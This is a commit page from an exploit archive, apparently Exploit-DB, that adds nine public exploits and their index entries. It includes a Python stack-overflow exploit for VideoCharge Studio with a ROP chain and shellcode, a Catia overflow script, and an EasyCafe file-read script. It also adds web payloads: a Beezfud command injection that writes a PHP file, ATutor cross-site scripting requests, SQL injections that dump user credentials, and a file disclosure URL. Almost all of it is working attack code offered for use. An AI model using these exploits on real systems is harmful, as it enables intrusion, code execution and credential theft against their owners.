DB: 2015-12-27
9 new exploits
This commit is contained in:
parent
a78b7bb472
commit
415f43407d
10 changed files with 368 additions and 0 deletions
|
@ -35334,6 +35334,8 @@ id,file,description,date,author,platform,type,port
|
|||
39072,platforms/win64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",win64,dos,0
|
||||
39073,platforms/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/reboot.cgi Unauthenticated Remote Reboot DoS",2014-02-03,"Josue Rojas",cgi,dos,0
|
||||
39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0
|
||||
39105,platforms/windows/remote/39105.py,"VideoCharge Studio 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow Vulnerability",2014-02-19,"Julien Ahrens",windows,remote,0
|
||||
39104,platforms/multiple/remote/39104.py,"Dassault Systemes Catia Stack Buffer Overflow Vulnerability",2014-02-19,"Mohamed Shetta",multiple,remote,0
|
||||
39076,platforms/multiple/dos/39076.txt,"Wireshark infer_pkt_encap - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0
|
||||
39077,platforms/multiple/dos/39077.txt,"Wireshark AirPDcapDecryptWPABroadcastKey - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0
|
||||
39078,platforms/php/webapps/39078.txt,"Web Video Streamer Multiple Security Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0
|
||||
|
@ -35351,6 +35353,13 @@ id,file,description,date,author,platform,type,port
|
|||
39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme Arbitrary File Upload Vulnerability",2014-02-05,"TUNISIAN CYBER",php,webapps,0
|
||||
39091,platforms/php/webapps/39091.pl,"WHMCS 'cart.php' Denial of Service Vulnerability",2014-02-07,Amir,php,webapps,0
|
||||
39092,platforms/php/webapps/39092.pl,"phpBB <= 3.0.8 Remote Denial of Service Vulnerability",2014-02-11,Amir,php,webapps,0
|
||||
39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
|
||||
39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
|
||||
39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal Vulnerability",2014-02-19,"Tom Adams",php,webapps,0
|
||||
39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload Vulnerability",2014-02-18,"TUNISIAN CYBER",php,webapps,0
|
||||
39102,platforms/windows/local/39102..py,"EasyCafe Server <= 2.2.14 Remote File Read",2015-12-26,R-73eN,windows,local,0
|
||||
39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure Vulnerability",2014-02-22,peng.deng,asp,webapps,0
|
||||
39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0
|
||||
39108,platforms/php/webapps/39108.txt,"POSH 3.1.x 'addtoapplication.php' SQL Injection Vulnerability",2014-02-26,"Anthony BAUBE",php,webapps,0
|
||||
39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection Vulnerability",2014-03-04,anonymous,php,webapps,0
|
||||
39110,platforms/php/webapps/39110.txt,"Cory Jobs Search 'cid' Parameter SQL Injection Vulnerability",2014-03-05,Slotleet,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
7
platforms/asp/webapps/39106.txt
Executable file
7
platforms/asp/webapps/39106.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/65740/info
|
||||
|
||||
eshtery CMS is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
|
||||
|
||||
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
|
||||
|
||||
http://www.example.com/[path]/FileManager.aspx?file=E:\web\admin.asp
|
25
platforms/multiple/remote/39104.py
Executable file
25
platforms/multiple/remote/39104.py
Executable file
|
@ -0,0 +1,25 @@
|
|||
source: http://www.securityfocus.com/bid/65675/info
|
||||
|
||||
Catia is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.
|
||||
|
||||
An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
|
||||
|
||||
Catia V5-6R2013 is vulnerable.
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
import socket
|
||||
import struct
|
||||
import ctypes
|
||||
|
||||
RetAdd="\x90\x90\x90\x90"
|
||||
Shell="S" *1000
|
||||
buff= "\x00\x01\x00\x30" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "\x00" * 48 + "CATV5_Backbone_Bus" +"\x00" + "\x00"* 49 + "\x00\x00\x00\x00"
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect(("192.168.0.3", 55555))
|
||||
#s.connect(("192.168.0.5", 55558))
|
||||
s.send(struct.pack('>I',len(buff) ))
|
||||
s.send(buff)
|
||||
buff= "\x02\x00\x00\x00" + RetAdd*3 + "\x00\x00\x00\x00" * 13 + "\x00\x00\x00\x00" * 5 + "CATV5_AllApplications" +"\x00" + "\x00"* 43 +"\x00\x00\x98" + "\x00\x00\x00\x01" +"\x00"*4 +"\x08\x00\x00\x00" + Shell
|
||||
s.send(struct.pack('>I',len(buff) ))
|
||||
s.send(buff)
|
27
platforms/php/webapps/39093.txt
Executable file
27
platforms/php/webapps/39093.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
================================================================================
|
||||
# Beezfud Remote Code Execution
|
||||
================================================================================
|
||||
# Vendor Homepage: https://github.com/EVA-01/beezfud
|
||||
# Date: 23/12/2015
|
||||
# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
|
||||
# Author: Ashiyane Digital Security Team
|
||||
# Contact: hehsan979@gmail.com
|
||||
# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
|
||||
================================================================================
|
||||
# Vulnerable File : index.php
|
||||
|
||||
# PoC :
|
||||
|
||||
http://localhost/beezfud/index.php?parameter=;Command;
|
||||
|
||||
Vulnerable Parameters : lookback , max , range , latest , earliest
|
||||
|
||||
|
||||
Example :
|
||||
|
||||
http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo();
|
||||
?>' >info.php;
|
||||
|
||||
================================================================================
|
||||
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
|
||||
================================================================================
|
83
platforms/php/webapps/39107.txt
Executable file
83
platforms/php/webapps/39107.txt
Executable file
|
@ -0,0 +1,83 @@
|
|||
source: http://www.securityfocus.com/bid/65744/info
|
||||
|
||||
ATutor is prone to multiple cross-site scripting vulnerabilities and a HTML-injection vulnerability.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
ATutor 2.1.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
1. During installation: xss and sql insertion:
|
||||
|
||||
---<request>---
|
||||
POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
|
||||
Host: www.example.com
|
||||
(...)
|
||||
Content-Length: 191
|
||||
|
||||
action=process&step=2&new_version=2.1.1&db_host=localhost&db_port=3306&db_login=root&db_password=superpass&db_name='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&tb_prefix=AT_&submit=Next+%BB+
|
||||
---<request>---
|
||||
|
||||
|
||||
---<response>---
|
||||
<ul><li>Database <b>\'>\"><script>alert(1)</script></b> created successfully.
|
||||
---<response>---
|
||||
|
||||
--> tb_prefix and new_version parameter are also vulnerable.
|
||||
|
||||
|
||||
# ==============================================================
|
||||
# 2. XSS
|
||||
|
||||
---<request>---
|
||||
POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
|
||||
Host: www.example.com
|
||||
(...)
|
||||
Content-Length: 667
|
||||
|
||||
action=process&form_admin_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&form_account_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&step=3&step2%5Bnew_version%5D='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&step2%5Bdb_host%5D=localhost&step2%5Bdb_port%5D=3306&step2%5Bdb_login%5D=root&step2%5Bdb_password%5D=superpass&step2%5Bdb_name%5D=atutor&step2%5Btb_prefix%5D=AT_&smtp=false&admin_username=admin&admin_password=&admin_email=admin%40here.com&site_name=Course+Server&email=admin%40here.com&just_social=0&home_url=&account_username=admin&account_password=&account_email=admin%40here.com&account_fname=admin&account_lname=admin&submit=+Next+%BB
|
||||
|
||||
---<request>---
|
||||
|
||||
Vulnerable to XSS are also parameters:
|
||||
step2%5Bnew_version%5D
|
||||
step2%5Bdb_host%5D
|
||||
step2%5Bdb_port%5D
|
||||
step2%5Bdb_login%5D
|
||||
step2%5Bdb_password%5D
|
||||
step2%5Bdb_name%5D
|
||||
step2%5Btb_prefix%5D
|
||||
|
||||
|
||||
# ==============================================================
|
||||
# 3. Persistent XSS (from admin)
|
||||
|
||||
---<request>---
|
||||
POST /k/cms/atutor/ATutor/mods/_standard/forums/admin/forum_add.php HTTP/1.1
|
||||
Host: www.example.com
|
||||
(...)
|
||||
Content-Length: 108
|
||||
|
||||
add_forum=true&title='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&description=aaaaaaaaaaaaaa&edit=0&submit=Save
|
||||
---<request>---
|
||||
|
||||
---<response>---
|
||||
<span class="required" title="Required Field">*</span><label
|
||||
for="title">Title</label><br />
|
||||
<input type="text" name="title" size="40" id="title"
|
||||
value="'>"><body/onload=alert(9999)>" />
|
||||
</div>
|
||||
---<response>---
|
||||
|
||||
|
||||
|
||||
# ==============================================================
|
||||
# 4. Edit config (from admin user):
|
||||
|
||||
---<request>---
|
||||
POST /k/cms/atutor/ATutor/admin/config_edit.php HTTP/1.1
|
||||
Host: www.example.com
|
||||
(...)
|
||||
Content-Length: 946
|
||||
|
||||
site_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&home_url=http%3A%2F%2Fwww.atutorspaces.com&default_language=en&contact_email=admin%40here.com&time_zone=0&session_timeout=20&max_file_size=10485760&max_course_size=104857600&max_course_float=2097152&max_login=5&display_name_format=1&master_list=0&allow_registration=1&allow_browse=1&show_current=1&allow_instructor_registration=1&use_captcha=0&allow_unenroll=1&email_confirmation=0&allow_instructor_requests=1&disable_create=0&email_notification=1&auto_approve_instructors=0&theme_categories=0&user_notes=0&illegal_extentions=exe+asp+php+php3+bat+cgi+pl+com+vbs+reg+pcd+pif+scr+bas+inf+vb+vbe+wsc+wsf+wsh&cache_dir=&cache_life=7200&latex_server=http%3A%2F%2Fwww.atutor.ca%2Fcgi%2Fmimetex.cgi%3F&course_backups=5&sent_msgs_ttl=120&check_version=0&fs_versioning=1&old_enable_mail_queue=0&enable_mail_queue=0&auto_install_languages=0&pretty_url=0&course_dir_name=0&apache_mod_rewrite=0&submit=Save
|
||||
---<request>---
|
10
platforms/php/webapps/39108.txt
Executable file
10
platforms/php/webapps/39108.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/65817/info
|
||||
|
||||
POSH is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Versions prior to POSH 3.3.0 are vulnerable.
|
||||
|
||||
http://www.example.com/portal/addtoapplication.php?pid=0&rssurl=url,nbvariables,defvar%20FROM%20dir_item,dir_cat_item
|
||||
%20WHERE%201=0%20UNION%20SELECT%201,2,3,4,5,6,(select%20group_concat(username,':',email,':',md5pass)%20from%20users),8%23
|
9
platforms/php/webapps/39109.txt
Executable file
9
platforms/php/webapps/39109.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/65960/info
|
||||
|
||||
Relevanssi plugin for WordPress is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
Versions prior to Relevanssi 3.3 are vulnerable.
|
||||
|
||||
http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi
|
9
platforms/php/webapps/39110.txt
Executable file
9
platforms/php/webapps/39110.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/65969/info
|
||||
|
||||
Cory Jobs Search is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Cory Jobs Search 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/coryapps/jobsearch/admincp/city.php?cid=[MySQL Injection]
|
55
platforms/windows/local/39102..py
Executable file
55
platforms/windows/local/39102..py
Executable file
|
@ -0,0 +1,55 @@
|
|||
#!/usr/bin/python -w
|
||||
# Title : EasyCafe Server <= 2.2.14 Remote File Read
|
||||
# Date : 25/12/2015
|
||||
# Author : R-73eN
|
||||
# Tested on : Windows 7 Ultimate
|
||||
# Software Link : http://www.tinasoft.com/easycafe/
|
||||
# Download Link: http://www.tinasoft.com/Download/easysetup.exe
|
||||
# Vulnerable Versions : EasyCafe Server <= 2.2.14
|
||||
# EasyCafe Server has a feature to upload file from the server to a client.
|
||||
# And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload,
|
||||
# Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it.
|
||||
# The problem is that a remote attacker can connect to port 831 and can retrive a file becuase the server doesn't validate the request,
|
||||
# and does not check if it has sent the UDP request which gives us full Read access to the system.
|
||||
#
|
||||
#EDB Note: Code my need some adjusting
|
||||
|
||||
import socket
|
||||
#Banner
|
||||
banner = ""
|
||||
banner += " ___ __ ____ _ _ \n"
|
||||
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
|
||||
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
|
||||
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
|
||||
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
|
||||
print banner
|
||||
|
||||
|
||||
|
||||
IP = "192.168.43.36" # Target IP
|
||||
PORT = 831
|
||||
file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read
|
||||
|
||||
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((IP, PORT))
|
||||
file_to_read = "\x43" + file_to_read
|
||||
hex_value = ''.join(x.encode('hex') for x in file_to_read)
|
||||
fill = "\x00"
|
||||
end = "\x01\x00\x00\x00\x01"
|
||||
payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end
|
||||
s.send(payload)
|
||||
s.settimeout(0)
|
||||
print "[+] Request Send Waiting for Response . . . [+]"
|
||||
|
||||
try:
|
||||
data = s.recv(261) # Get header
|
||||
while data:
|
||||
data = s.recv(2048)
|
||||
print data
|
||||
|
||||
except Exception:
|
||||
print "[+] https://www.infogen.al/ [+]"
|
||||
finally:
|
||||
s.close()
|
134
platforms/windows/remote/39105.py
Executable file
134
platforms/windows/remote/39105.py
Executable file
|
@ -0,0 +1,134 @@
|
|||
source: http://www.securityfocus.com/bid/65685/info
|
||||
|
||||
VideoCharge Studio is prone to a remote stack-based buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
|
||||
|
||||
Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts likely result in denial-of-service conditions.
|
||||
|
||||
VideoCharge Studio 2.12.3.685 is vulnerable; other versions may also be affected.
|
||||
|
||||
#!/usr/bin/python
|
||||
# Exploit Title: VideoCharge Studio v2.12.3.685 cc.dll GetHttpResponse()
|
||||
MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
|
||||
# Version: v2.12.3.685
|
||||
# Date: 2014-02-18
|
||||
# Author: Julien Ahrens (@MrTuxracer)
|
||||
# Homepage: http://www.rcesecurity.com
|
||||
# Software Link: http://www.videocharge.com
|
||||
# Tested on: Win7-GER (DEP enabled)
|
||||
#
|
||||
# Howto / Notes:
|
||||
# Since it's a MITM RCE you need to spoof the DNS Record for
|
||||
www.videocharge.com in order to successfully exploit this vulnerability
|
||||
#
|
||||
|
||||
from socket import *
|
||||
from struct import pack
|
||||
from time import sleep
|
||||
|
||||
host = "192.168.0.1"
|
||||
port = 80
|
||||
|
||||
s = socket(AF_INET, SOCK_STREAM)
|
||||
s.bind((host, port))
|
||||
s.listen(1)
|
||||
print "\n[+] Listening on %d ..." % port
|
||||
|
||||
cl, addr = s.accept()
|
||||
print "[+] Connection accepted from %s" % addr[0]
|
||||
|
||||
# Thanks Giuseppe D'Amore for the amazing shellcode
|
||||
# http://www.exploit-db.com/exploits/28996/
|
||||
shellcode =
|
||||
("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+
|
||||
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+
|
||||
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+
|
||||
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+
|
||||
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+
|
||||
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+
|
||||
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+
|
||||
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
|
||||
|
||||
junk0 = "\x90" * 1277
|
||||
junk1 = "\x90" * 1900
|
||||
nops="\x90" * 30
|
||||
jmpesp=pack('<L',0x102340e8) * 5 # jmp esp | {PAGE_EXECUTE_READ}
|
||||
[cc.dll]
|
||||
|
||||
# jump to controlled memory
|
||||
eip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN
|
||||
[zlib1.dll]
|
||||
|
||||
#
|
||||
# ROP registers structure:
|
||||
# EBP - VirtualProtect() call
|
||||
# ESP - lpAddress
|
||||
# EBX - dwSize
|
||||
# EDX - flNewProtect
|
||||
# ECX - lpflOldProtect
|
||||
#
|
||||
|
||||
# Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF]
|
||||
and MOV to EBP
|
||||
rop = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
|
||||
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
|
||||
rop += pack('<L',0xDE2D66F9) # XOR param 1
|
||||
rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll]
|
||||
rop += pack('<L',0xDEADBEEF) # XOR param 2
|
||||
rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] #
|
||||
RETN [cc.dll]
|
||||
rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll]
|
||||
rop += pack('<L',0xDEADBEEF) # Filler
|
||||
rop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll]
|
||||
|
||||
# Craft VirtualProtect() dwSize in EAX and MOV to EBX
|
||||
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
|
||||
rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll]
|
||||
rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll]
|
||||
|
||||
# Craft VirtualProtect() flNewProtect in EAX and MOV to EDX
|
||||
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
|
||||
rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll]
|
||||
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
|
||||
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
|
||||
rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll]
|
||||
rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
|
||||
rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll]
|
||||
|
||||
# Put writable offset for VirtualProtect() lpflOldProtect to ECX
|
||||
rop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll]
|
||||
rop += pack('<L',0x61B96180) # writable location [zlib1.dll]
|
||||
|
||||
# POP a value from the stack after PUSHAD and POP value to ESI
|
||||
# as a preparation for the VirtualProtect() call
|
||||
rop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll]
|
||||
rop += pack('<L',0x61B96180) # writable location from [zlib1.dll]
|
||||
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
|
||||
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
|
||||
|
||||
# Achievement unlocked: PUSHAD
|
||||
rop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll]
|
||||
rop += pack('<L',0x102340c5) # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]
|
||||
|
||||
payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcode
|
||||
|
||||
buffer = "HTTP/1.1 200 OK\r\n"
|
||||
buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n"
|
||||
buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with
|
||||
Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n"
|
||||
buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n"
|
||||
buffer += "Vary: Accept-Encoding\r\n"
|
||||
buffer += "Content-Length: 4000\r\n"
|
||||
buffer += "Connection: close\r\n"
|
||||
buffer += "Content-Type: text/html\r\n\r\n"
|
||||
buffer += payload
|
||||
buffer += "\r\n"
|
||||
|
||||
print cl.recv(1000)
|
||||
|
||||
cl.send(buffer)
|
||||
|
||||
print "[+] Sending exploit: OK\n"
|
||||
|
||||
sleep(3)
|
||||
cl.close()
|
||||
s.close()
|
Loading…
Add table
Reference in a new issue